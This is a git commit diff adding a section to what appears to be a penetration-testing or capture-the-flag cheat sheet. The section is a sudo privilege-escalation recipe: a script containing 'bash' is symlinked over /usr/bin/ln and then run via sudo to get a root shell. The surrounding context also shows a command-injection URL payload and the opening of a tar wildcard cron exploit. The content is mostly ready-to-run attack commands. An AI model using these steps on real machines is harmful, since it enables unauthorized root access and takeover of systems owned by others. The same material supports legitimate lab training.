Update Cheat Sheet.md

2024-11-10 06:34:17 +00:00 · 2021-01-14 00:45:08 +05:00 · 2021-01-14 00:45:08 +05:00 · b6be592f0f
commit b6be592f0f
parent f2bce717c7
1 changed files with 11 additions and 0 deletions
--- a/Sheet.md
+++ b/Sheet.md
@ -126,6 +126,17 @@ Login as any user to see that it gets logged then try to login with a malicious

 Then `http://ip/page?a=whoami;`

+### Getting root with ln (symlink)
+
+If we have permissions to run /usr/bin/ln as root we can onw the machine
+```
+echo 'bash' > root
+chmod +x root 
+sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
+sudo /usr/bin/ln
+
+```
+
 ### Tar Exploitation

 When ever you see a cronjob running with a command `cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *` go to that folder from which a backup is being created and running these command in that directory <br/ >